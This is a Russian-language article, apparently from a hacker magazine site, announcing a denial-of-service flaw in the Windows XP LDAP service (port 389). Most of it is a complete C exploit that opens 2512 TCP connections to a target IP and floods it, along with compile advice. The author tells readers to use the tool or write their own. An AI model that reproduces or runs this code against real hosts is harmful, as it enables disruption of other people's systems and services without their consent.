Нашей группой (N-force) была обнаружена
уязвимость в операционной системе Windows XP.
Новая атака не влечет за собой фатальных
последствий типа «зависания» или
перезагрузки, но способна вызвать
существенную загрузку процессора. На сей
раз объектом нападок стала реализация LDAP-протокола
в Windows XP. Идея чрезвычайно проста: в 389-й порт
посылается большое количество TCP/IP пакетов,
после чего данный сервис умирает.

Данный протокол по умолчанию установлен в
Windows XP и предыдущих версиях NT’ей. Поэтому
большинство компьютеров с данными
системами и активным протоколом уязвимы.

Ниже идёт простой эксплоит, реализация под
Windows.

//—————————
/* 
* Windows XP LDAP DoS
*
* Run: ./d0s ip
*
* Lightweight Directory Access Protocol (LDAP)
* The primary access protocol for Active Directory.
* Denial of Service Exploit
*
* Author: sl0n
* Email: bigafroelephant@mail.ru
* team: N-force group

*/

#include <stdio.h>
#include <winsock.h>

int main(int argc, char *argv[])
{
sockaddr_in peer;
int port,i;
int num_socks=2512;
int sockfd[2512];
char *send_buffer="sl0n";
char *addr=argv[1];
WSADATA winSockData;

printf("::WinXP DoS by n-force groUp::\n");
if ( argc < 2 )
{
printf(" — Usage: d0s [ip] \n");
return -1;
}

port=389;

/****** INIT **********/

WSACleanup();
WSAStartup(0x0101, &winSockData);

/********************/

peer.sin_family = AF_INET;
peer.sin_port = htons(port);
peer.sin_addr.s_addr = inet_addr(addr);

for(i=0; i<num_socks;i++)
{
if( (sockfd[i]=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
printf("::Error creating socket::");
exit(1);
}
}

for(i=0; i<num_socks;i++)
{
if( connect(sockfd[i],(sockaddr*)&peer, sizeof(peer))==-1)
{
printf("::Failed t0 connect [maybe attack was g00d]::\n");
exit(1);
}
}

for(i=0; i<num_socks;i++)
{

if(send(sockfd[i],send_buffer,strlen(send_buffer),0) ==-1)
{
printf("::Error sending packet::");
exit(1);
}
}
for(i=0; i<num_socks;i++)
{
closesocket(sockfd[i]);
}

WSACleanup();
exit(0);

}
//—————————

В данном эксплоите в начале создаётся 2512
сокетов, потом они все соединяются с
жертвой, на порт 389. После этого в этот порт
посылаеся смертельный пакет по сути говоря
это слово "sl0n". Cо временем данный
эксплоит будет реализован и под GUI
интерфейс. А пока пользуйтесь этим если он
вас чем-то не устраивает напишите свой.

Для компиляции рекомендую использовать
Borland С++. На этом позвольте откланяться.

Оставить мнение

Check Also

Цифровой паноптикум. Настоящее и будущее тотальной слежки за пользователями

Даже если ты тщательно заботишься о защите своих данных, это не даст тебе желаемой приватн…